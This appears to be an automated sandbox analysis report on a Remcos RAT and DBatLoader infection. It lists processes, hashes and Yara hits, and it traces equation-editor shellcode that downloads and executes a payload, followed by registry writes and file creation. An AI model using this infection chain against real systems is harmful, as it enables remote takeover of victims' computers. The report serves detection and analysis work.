                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000011.00000002.432128684.0000000003321000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:07:42:31
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                  Start time:07:42:31
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:07:42:31
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:07:42:37
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000017.00000002.465177486.00000000030A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:07:42:51
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Users\Public\Libraries\Rdxcjsng.PIF
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Rdxcjsng.PIF"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:07:42:59
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000019.00000002.493989881.0000000003191000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true


                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:17.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:60.8%
                                                                                                                                                                                    Total number of Nodes:153
                                                                                                                                                                                    Total number of Limit Nodes:5


                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(03540443), ref: 03540451
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2508257586-0
                                                                                                                                                                                    • Opcode ID: 0a5f03d0e266d9af780f023f5610c2f489518bf5cb5e6640c817524eb7b89c5f
                                                                                                                                                                                    • Instruction ID: cd8fb6402939a59d765ea24754640ebd3d564a7097d6045f3282505f43ba394a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5f03d0e266d9af780f023f5610c2f489518bf5cb5e6640c817524eb7b89c5f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 564167A680D3C12FDB1A97306D69695FF70BE53108F6D89CE92C60B0F3E2988505D767
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(03540443), ref: 03540451
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2508257586-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 112 3540451-354045d LoadLibraryW call 354046b 115 35404cd-35404e6 call 35404ee 112->115 116 354045f-35404c4 call 35404c0 URLDownloadToFileW call 35404d9 112->116 121 354054d-3540559 115->121 122 35404e8-354050a ShellExecuteW call 3540513 115->122 131 35404c9-35404cb 116->131 124 354055c 121->124 122->124 140 354050c 122->140 127 3540564-3540568 124->127 128 354055e-3540562 124->128 133 354057d-354057f 127->133 134 354056a-354056e 127->134 128->127 132 3540570-3540577 128->132 131->115 137 3540579 132->137 138 354057b 132->138 139 354058f-3540590 133->139 134->132 134->133 137->133 138->133 141 3540581-354058a 138->141 140->133 142 354050e-3540518 ExitProcess 140->142 145 3540553-3540556 141->145 146 354058c 141->146 145->141 147 3540558 145->147 146->139 147->124
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(03540443), ref: 03540451
                                                                                                                                                                                      • Part of subcall function 0354046B: URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                      • Part of subcall function 0354046B: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                      • Part of subcall function 0354046B: ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2508257586-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 149 354046b-35404e6 call 35404c0 URLDownloadToFileW call 35404d9 call 35404ee 161 354054d-3540559 149->161 162 35404e8-354050a ShellExecuteW call 3540513 149->162 163 354055c 161->163 162->163 175 354050c 162->175 165 3540564-3540568 163->165 166 354055e-3540562 163->166 169 354057d-354057f 165->169 170 354056a-354056e 165->170 166->165 168 3540570-3540577 166->168 172 3540579 168->172 173 354057b 168->173 174 354058f-3540590 169->174 170->168 170->169 172->169 173->169 176 3540581-354058a 173->176 175->169 177 354050e-3540518 ExitProcess 175->177 180 3540553-3540556 176->180 181 354058c 176->181 180->176 182 3540558 180->182 181->174 182->163
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3584569557-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 184 35404c0-35404c2 URLDownloadToFileW 185 35404c9-35404e6 call 35404ee 184->185 186 35404c4 call 35404d9 184->186 191 354054d-3540559 185->191 192 35404e8-354050a ShellExecuteW call 3540513 185->192 186->185 193 354055c 191->193 192->193 205 354050c 192->205 195 3540564-3540568 193->195 196 354055e-3540562 193->196 199 354057d-354057f 195->199 200 354056a-354056e 195->200 196->195 198 3540570-3540577 196->198 202 3540579 198->202 203 354057b 198->203 204 354058f-3540590 199->204 200->198 200->199 202->199 203->199 206 3540581-354058a 203->206 205->199 207 354050e-3540518 ExitProcess 205->207 210 3540553-3540556 206->210 211 354058c 206->211 210->206 212 3540558 210->212 211->204 212->193
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                      • Part of subcall function 035404D9: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                      • Part of subcall function 035404D9: ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3584569557-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 214 35404ee-3540500 ShellExecuteW 216 3540507-354050a 214->216 217 3540502 call 3540513 214->217 219 354055c 216->219 220 354050c 216->220 217->216 221 3540564-3540568 219->221 222 354055e-3540562 219->222 223 354057d-354057f 220->223 224 354050e-3540518 ExitProcess 220->224 221->223 226 354056a-354056e 221->226 222->221 225 3540570-3540577 222->225 227 354058f-3540590 223->227 229 3540579 225->229 230 354057b 225->230 226->223 226->225 229->223 230->223 231 3540581-354058a 230->231 234 3540553-3540556 231->234 235 354058c 231->235 234->231 236 3540558 234->236 235->227 236->219
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                      • Part of subcall function 03540513: ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteExitProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1124553745-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 237 35404d9-35404db 239 35404e0-35404e6 237->239 240 35404db call 35404ee 237->240 241 354054d-3540559 239->241 242 35404e8-354050a ShellExecuteW call 3540513 239->242 240->239 243 354055c 241->243 242->243 255 354050c 242->255 245 3540564-3540568 243->245 246 354055e-3540562 243->246 249 354057d-354057f 245->249 250 354056a-354056e 245->250 246->245 248 3540570-3540577 246->248 252 3540579 248->252 253 354057b 248->253 254 354058f-3540590 249->254 250->248 250->249 252->249 253->249 256 3540581-354058a 253->256 255->249 257 354050e-3540518 ExitProcess 255->257 260 3540553-3540556 256->260 261 354058c 256->261 260->256 262 3540558 260->262 261->254 262->243
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteExitProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1124553745-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 264 3540513-3540518 ExitProcess
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    control_flow_graph 266 354051a-3540525 GetPEB 267 3540528-3540539 call 3540542 266->267 270 354053b-354053f 267->270
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                                                                                                                    • Instruction ID: b9b3d90e6400924430747b4874ea9b62a8c299a9f61612832ec95f7d05809be1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9D05E712025028FC348DB04E940EA6F37AFFC4211B64C268D5054B669C330EC91CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    control_flow_graph 271 35403aa-35403c5 ExitProcess call 35403c3
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitProcess.KERNEL32(03540398), ref: 035403AA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                    • Opcode ID: 163300cb0f5e1ff4de632dbd47d6d67cd98515e77528f93afd9f0c430eff25bd
                                                                                                                                                                                    • Instruction ID: 286bdea990d34a737443ba2b07b9ef4b29e8ed3727e8d9299668cd1e61a83b82
                                                                                                                                                                                    • Opcode Fuzzy Hash: 163300cb0f5e1ff4de632dbd47d6d67cd98515e77528f93afd9f0c430eff25bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2C08C6A80AB421A8608E2B03AA70CCFA30FA42214360548242408F2B3F0A4A3E851D2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:6.8%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                                    Total number of Nodes:1170
                                                                                                                                                                                    Total number of Limit Nodes:17
60719->60720 60721 32582de 60720->60721 60722 3247be8 17 API calls 60721->60722 60723 3258302 60722->60723 60724 3234824 11 API calls 60723->60724 60725 3258323 60724->60725 60726 32347b0 11 API calls 60725->60726 60727 325835a 60726->60727 60728 3247be8 17 API calls 60727->60728 60729 325837e 60728->60729 60730 3247be8 17 API calls 60729->60730 60731 32583b1 60730->60731 60732 3247be8 17 API calls 60731->60732 60733 32583e4 60732->60733 60734 3247be8 17 API calls 60733->60734 60735 3258417 60734->60735 60736 3247be8 17 API calls 60735->60736 60737 325844a 60736->60737 60738 3247be8 17 API calls 60737->60738 60739 325847d 60738->60739 60740 3247be8 17 API calls 60739->60740 60741 32584b0 60740->60741 60742 3247be8 17 API calls 60741->60742 60743 32584e3 60742->60743 60744 3234824 11 API calls 60743->60744 60745 3258504 60744->60745 60746 32347b0 11 API calls 60745->60746 60747 325853b 60746->60747 60748 3247be8 17 API calls 60747->60748 60749 325855f 60748->60749 60750 3234824 11 API calls 60749->60750 60751 3258580 60750->60751 60752 32347b0 11 API calls 60751->60752 60753 32585b7 60752->60753 60754 3247be8 17 API calls 60753->60754 60755 32585db 60754->60755 60756 3234824 11 API calls 60755->60756 60757 32585fc 60756->60757 60758 32347b0 11 API calls 60757->60758 60759 3258633 60758->60759 60760 3247be8 17 API calls 60759->60760 60761 3258657 60760->60761 60762 3247be8 17 API calls 60761->60762 60763 325868a 60762->60763 60764 3247be8 17 API calls 60763->60764 60765 32586bd 60764->60765 60766 3247be8 17 API calls 60765->60766 60767 32586f0 60766->60767 60768 3247be8 17 API calls 60767->60768 60769 3258723 60768->60769 60770 3247be8 17 API calls 60769->60770 60771 3258756 60770->60771 60772 3247be8 17 API calls 60771->60772 60773 3258789 60772->60773 60774 3247be8 17 API calls 60773->60774 60775 32587bc 60774->60775 60776 3247be8 17 API calls 60775->60776 60777 32587ef 60776->60777 60778 3247be8 17 API calls 60777->60778 60779 3258822 60778->60779 60780 3247be8 17 
API calls 60779->60780 60781 3258855 60780->60781 60782 3247be8 17 API calls 60781->60782 60783 3258888 60782->60783 60784 3247be8 17 API calls 60783->60784 60785 32588bb 60784->60785 60786 3247be8 17 API calls 60785->60786 60787 32588ee 60786->60787 60788 3247be8 17 API calls 60787->60788 60789 3258921 60788->60789 60790 3247be8 17 API calls 60789->60790 60791 3258954 60790->60791 60792 3247be8 17 API calls 60791->60792 60793 3258987 60792->60793 60794 3247be8 17 API calls 60793->60794 60795 32589ba 60794->60795 60796 3247be8 17 API calls 60795->60796 60797 32589ed 60796->60797 60798 3247be8 17 API calls 60797->60798 60799 3258a20 60798->60799 60800 3234824 11 API calls 60799->60800 60801 3258a41 60800->60801 60802 32347b0 11 API calls 60801->60802 60803 3258a78 60802->60803 60804 3247be8 17 API calls 60803->60804 60805 3258a9c 60804->60805 60806 3234824 11 API calls 60805->60806 60807 3258abd 60806->60807 60808 32347b0 11 API calls 60807->60808 60809 3258af4 60808->60809 60810 3247be8 17 API calls 60809->60810 60811 3258b18 60810->60811 60812 3234824 11 API calls 60811->60812 60813 3258b39 60812->60813 60814 32347b0 11 API calls 60813->60814 60815 3258b70 60814->60815 60816 3247be8 17 API calls 60815->60816 60817 3258b94 ExitProcess 60816->60817 60819 3247bfd 60818->60819 60820 3247c05 LoadLibraryW GetModuleHandleW 60819->60820 60821 3234964 60820->60821 60822 3247c30 GetProcAddress 60821->60822 60881 3247b20 60822->60881 60824 3247c57 60890 32344c4 60824->60890 60828 324d32f 60827->60828 60829 324d35a RegOpenKeyA 60828->60829 60830 324d368 60829->60830 60831 32349bc 11 API calls 60830->60831 60832 324d380 60831->60832 60833 324d38d RegSetValueExA RegCloseKey 60832->60833 60834 324d3b1 60833->60834 60835 32344c4 11 API calls 60834->60835 60836 324d3be 60835->60836 60837 32344a0 11 API calls 60836->60837 60838 324d3c6 60837->60838 60838->60125 60839->60438 60841 3234970 60840->60841 60842 3234564 11 API calls 60841->60842 60843 32349ab 60841->60843 60844 3234987 
60842->60844 60843->60536 60844->60843 60900 3232c2c 11 API calls 60844->60900 60846->60274 60847->60419 60848->60589 60850 324d1bd 60849->60850 60851 324d1e9 60850->60851 60901 3234688 11 API calls 60850->60901 60902 32344f4 11 API calls 60850->60902 60852 32344a0 11 API calls 60851->60852 60854 324d1fe 60852->60854 60854->60367 60857 3234964 60856->60857 60858 3237e22 GetFileAttributesA 60857->60858 60859 3237e2d 60858->60859 60859->60430 60859->60431 60861 3234b90 11 API calls 60860->60861 60862 324c764 60861->60862 60863 324c785 60862->60863 60864 32349bc 11 API calls 60862->60864 60863->60527 60864->60862 60866 324c40e 60865->60866 60903 3234ee4 60866->60903 60868 324c416 60869 324c436 RtlDosPathNameToNtPathName_U 60868->60869 60909 324c340 60869->60909 60871 324c452 NtCreateFile 60872 324c47d 60871->60872 60873 32349bc 11 API calls 60872->60873 60874 324c48f NtWriteFile NtClose 60873->60874 60875 324c4b9 60874->60875 60910 3234c24 60875->60910 60878 32344a0 11 API calls 60879 324c4c9 60878->60879 60879->60430 60880->60286 60894 3234538 60881->60894 60884 32347b0 11 API calls 60885 3247b53 60884->60885 60886 3247b5b GetModuleHandleA GetProcAddress VirtualProtect 60885->60886 60887 3247b97 60886->60887 60888 32344c4 11 API calls 60887->60888 60889 3247ba4 60888->60889 60889->60824 60892 32344ca 60890->60892 60891 32344f0 60891->60097 60892->60891 60899 3232c2c 11 API calls 60892->60899 60896 323453c 60894->60896 60895 3234560 60895->60884 60896->60895 60898 3232c2c 11 API calls 60896->60898 60898->60895 60899->60892 60900->60843 60901->60850 60902->60850 60904 3234f00 60903->60904 60905 3234eea SysAllocStringLen 60903->60905 60904->60868 60905->60904 60906 3234bf4 60905->60906 60907 3234c10 60906->60907 60908 3234c00 SysAllocStringLen 60906->60908 60907->60868 60908->60906 60908->60907 60909->60871 60911 3234c2a SysFreeString 60910->60911 60912 3234c38 60910->60912 60911->60912 60912->60878 60913 15ca9de4 60914 15ca9e02 _wcslen 60913->60914 60915 15ca9e0d 
